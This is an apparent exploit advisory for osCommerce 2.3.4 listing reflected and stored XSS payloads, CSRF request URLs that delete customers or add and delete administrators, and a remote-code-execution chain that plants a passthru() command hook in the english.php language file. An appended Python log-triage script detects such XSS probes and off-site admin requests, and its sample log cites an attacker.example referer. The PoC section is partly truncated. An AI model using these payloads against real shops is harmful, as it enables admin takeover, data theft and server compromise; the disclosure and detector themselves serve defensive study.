#Title: osCommerce 2.3.4 - Multiple vulnerabilities
#Date: 10.07.14
#Affected versions: => 2.3.4 (latest atm)
#Vendor: oscommerce.com
#Tested on: Apache 2.2.22 [at] Debian
#Contact: smash [at] devilteam.pl

#Cross Site Scripting

1. Reflected XSS -> Send Email
Vulnerable parameters - customers_email_address & mail_sent_to

a) POST Request:
POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1
Host: localhost

customers_email_address=&from=fuck@shit.up&subject=test&message=test

Response:
HTTP/1.1 200 OK
(...)
Customer:
(...)
CSRF PoC:
b) GET Request:
GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1
Host: localhost

Response:
(...)
Success&nbps;Notice: Email sent to:
(...)

2. Persistent XSS via CSRF -> Newsletter
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1
Host: localhost

module=newsletter&title=&content=

CSRF PoC:
First popbox (123) will be executed whenever someone visits the newsletters page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php

Response:
(...)
Preview&nbps;
(...)

Second one will be executed whenever someone visits a specific newsletter page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview

Response:
(...)

3. Persistent XSS via CSRF -> Banner manager
Vulnerable parameter - banners_title
PoC:
JS will be executed whenever someone visits the banner manager page or a specific banner page:
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID]

Response:
View Banner&nbps; group

4. Persistent XSS via CSRF -> Locations / Taxes
The Countries tab is taken as an example, but the same vulnerability affects the other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones.
PoC:
JS will be executed whenever someone visits the 'countries' tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php

Response:
(...)
AAAA xs sed
(...)

5. Persistent XSS via CSRF -> Localization

a) Currencies
PoC:
JS will be executed whenever someone visits the currencies tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php

Response:
(...)
(default) 666 666.00000000
(...)

b) Languages
PoC:
JS will be executed whenever someone visits the languages tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php

Response:
(...)
66
(...)

c) Orders status
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost

orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS

Response:
(...)
'>"><>XSS
(...)
'>"><>XSS
(...)
English&nbps;'>"><>XSS

#Boring CSRF

- Remove any item from cart
localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product

- Add item to cart
localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product

- Remove address book entry
localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1

- Remove specific country
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm

- Remove specific currency
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm

- Change store credentials
I'm too bored to craft more requests; the whole 'Configuration' & 'Catalog' panel suffers from CSRF.
localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php

...and a lot more.

#Less boring CSRF

- Send email as admin -> Send email
It is possible to send email to a specific user, to newsletter subscribers, or to all of them. In this case, '***' stands for sending mail to all customers.
- Delete / Edit specific user
Remove user PoC:
localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm
Edit user PoC:
- Add / Edit / Delete admin
Add admin account:
Change admin (set new password):
Remove admin:
localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm

- RCE via CSRF -> Define Languages
The content of a chosen file can be changed in the 'Define Languages' tab; this PoC uses the default English language, and so the default file path. The file MUST be writable. The value is the default content of english.php; as you can notice, a passthru() call has been included in it.
localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a
PoC:
%d to %d (of %d products)'); define('TEXT_DISPLAY_NUMBER_OF_ORDERS', 'Displaying %d to %d (of %d orders)'); define('TEXT_DISPLAY_NUMBER_OF_REVIEWS', 'Displaying %d to %d (of %d reviews)'); define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS_NEW', 'Displaying %d to %d (of %d new products)'); define('TEXT_DISPLAY_NUMBER_OF_SPECIALS', 'Displaying %d to %d (of %d specials)'); define('PREVNEXT_TITLE_FIRST_PAGE', 'First Page'); define('PREVNEXT_TITLE_PREVIOUS_PAGE', 'Previous Page'); define('PREVNEXT_TITLE_NEXT_PAGE', 'Next Page'); define('PREVNEXT_TITLE_LAST_PAGE', 'Last Page'); define('PREVNEXT_TITLE_PAGE_NO', 'Page %d'); define('PREVNEXT_TITLE_PREV_SET_OF_NO_PAGE', 'Previous Set of %d Pages'); define('PREVNEXT_TITLE_NEXT_SET_OF_NO_PAGE', 'Next Set of %d Pages'); define('PREVNEXT_BUTTON_FIRST', '<>]'); define('PREVNEXT_BUTTON_LAST', 'LAST>>'); define('IMAGE_BUTTON_ADD_ADDRESS', 'Add Address'); define('IMAGE_BUTTON_ADDRESS_BOOK', 'Address Book'); define('IMAGE_BUTTON_BACK', 'Back'); define('IMAGE_BUTTON_BUY_NOW', 'Buy Now'); define('IMAGE_BUTTON_CHANGE_ADDRESS', 'Change Address'); define('IMAGE_BUTTON_CHECKOUT', 'Checkout'); define('IMAGE_BUTTON_CONFIRM_ORDER', 'Confirm Order'); define('IMAGE_BUTTON_CONTINUE', 'Continue'); define('IMAGE_BUTTON_CONTINUE_SHOPPING', 'Continue Shopping'); define('IMAGE_BUTTON_DELETE', 'Delete'); define('IMAGE_BUTTON_EDIT_ACCOUNT', 'Edit Account'); define('IMAGE_BUTTON_HISTORY', 'Order History'); define('IMAGE_BUTTON_LOGIN', 'Sign In'); define('IMAGE_BUTTON_IN_CART', 'Add to Cart'); define('IMAGE_BUTTON_NOTIFICATIONS', 'Notifications'); define('IMAGE_BUTTON_QUICK_FIND', 'Quick Find'); define('IMAGE_BUTTON_REMOVE_NOTIFICATIONS', 'Remove Notifications'); define('IMAGE_BUTTON_REVIEWS', 'Reviews'); define('IMAGE_BUTTON_SEARCH', 'Search'); define('IMAGE_BUTTON_SHIPPING_OPTIONS', 'Shipping Options'); define('IMAGE_BUTTON_TELL_A_FRIEND', 'Tell a Friend'); define('IMAGE_BUTTON_UPDATE', 'Update'); define('IMAGE_BUTTON_UPDATE_CART', 'Update Cart'); 
define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Review'); define('SMALL_IMAGE_BUTTON_DELETE', 'Delete'); define('SMALL_IMAGE_BUTTON_EDIT', 'Edit'); define('SMALL_IMAGE_BUTTON_VIEW', 'View'); define('ICON_ARROW_RIGHT', 'more'); define('ICON_CART', 'In Cart'); define('ICON_ERROR', 'Error'); define('ICON_SUCCESS', 'Success'); define('ICON_WARNING', 'Warning'); define('TEXT_GREETING_PERSONAL', 'Welcome back %s! Would you like to see which new products are available to purchase?'); define('TEXT_GREETING_PERSONAL_RELOGON', 'If you are not %s, please log yourself in with your account information.'); define('TEXT_GREETING_GUEST', 'Welcome Guest! Would you like to log yourself in? Or would you prefer to create an account?'); define('TEXT_SORT_PRODUCTS', 'Sort products '); define('TEXT_DESCENDINGLY', 'descendingly'); define('TEXT_ASCENDINGLY', 'ascendingly'); define('TEXT_BY', ' by '); define('TEXT_REVIEW_BY', 'by %s'); define('TEXT_REVIEW_WORD_COUNT', '%s words'); define('TEXT_REVIEW_RATING', 'Rating: %s [%s]'); define('TEXT_REVIEW_DATE_ADDED', 'Date Added: %s'); define('TEXT_NO_REVIEWS', 'There are currently no product reviews.'); define('TEXT_NO_NEW_PRODUCTS', 'There are currently no products.'); define('TEXT_UNKNOWN_TAX_RATE', 'Unknown tax rate'); define('TEXT_REQUIRED', 'Required'); define('ERROR_TEP_MAIL', 'TEP ERROR: Cannot send the email through the specified SMTP server. Please check your php.ini setting and correct the SMTP server if necessary.'); define('TEXT_CCVAL_ERROR_INVALID_DATE', 'The expiry date entered for the credit card is invalid. Please check the date and try again.'); define('TEXT_CCVAL_ERROR_INVALID_NUMBER', 'The credit card number entered is invalid. Please check the number and try again.'); define('TEXT_CCVAL_ERROR_UNKNOWN_CARD', 'The first four digits of the number entered are: %s. If that number is correct, we do not accept that type of credit card. If it is wrong, please try again.'); define('FOOTER_TEXT_BODY', 'Copyright © ' . date('Y') . ' ' . 
STORE_NAME . '
Powered by osCommerce'); ?>
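For operators who cannot patch yet, the following added triage script (not part of this advisory or of osCommerce) scans Apache combined-format access logs for the two request patterns the advisory describes: script payloads in admin query strings and state-changing admin actions (insert, deleteconfirm, preview) arriving with a missing or off-host Referer. The log lines, the deployment path and the `localhost` admin host are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Admin path prefix taken from the advisory's test deployment (an assumption for
# other installs: adjust it to your own admin path).
ADMIN_PREFIX = "/osc/oscommerce-2.3.4/catalog/admin/"
# State-changing or input-reflecting admin actions named in the advisory.
RISKY_ACTIONS = {"insert", "deleteconfirm", "preview", "save"}
XSS_MARKERS = re.compile(r"<\s*script|javascript:|onerror\s*=|alert\s*\(", re.I)
# Apache combined log format. POST bodies are not logged, so only query-string
# payloads (e.g. mail_sent_to) are visible; body-borne XSS needs app-level logging.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def analyse_line(line, own_host="localhost"):
    """Return a finding dict for one log line, or None if nothing looks suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    findings = []
    # 1. Script payloads in any query parameter (reflected XSS probes).
    if XSS_MARKERS.search(unquote(url.query)):
        findings.append("xss-probe")
    # 2. Admin action requests whose Referer is absent or off-host. Browsers and
    #    proxies may strip Referer, so treat this as a review signal, not a verdict.
    if url.path.startswith(ADMIN_PREFIX):
        action = parse_qs(url.query, keep_blank_values=True).get("action", [""])[0]
        ref_host = urlsplit(m.group("referer")).hostname or ""
        if action in RISKY_ACTIONS and ref_host != own_host:
            findings.append("csrf-suspect")
    if not findings:
        return None
    return {"ip": m.group("ip"), "path": m.group("path"), "findings": findings}

def triage(log_text, own_host="localhost"):
    """Run analyse_line over every non-empty line and keep the flagged requests."""
    hits = (analyse_line(l, own_host) for l in log_text.splitlines() if l.strip())
    return [h for h in hits if h]

# Constructed sample lines: an XSS probe, a cross-origin admin delete, a legitimate insert.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2014:12:00:01 +0000] "GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jul/2014:12:00:02 +0000] "GET /osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm HTTP/1.1" 302 0 "http://attacker.example/lure.html" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2014:12:00:03 +0000] "POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1" 302 0 "http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php" "Mozilla/5.0"
"""
```

Running `triage(SAMPLE_LOG)` flags the first two constructed lines and leaves the same-origin insert alone; a Referer check is only a stop-gap, the real fix is a per-session anti-CSRF token on every admin form plus HTML-escaping of reflected parameters.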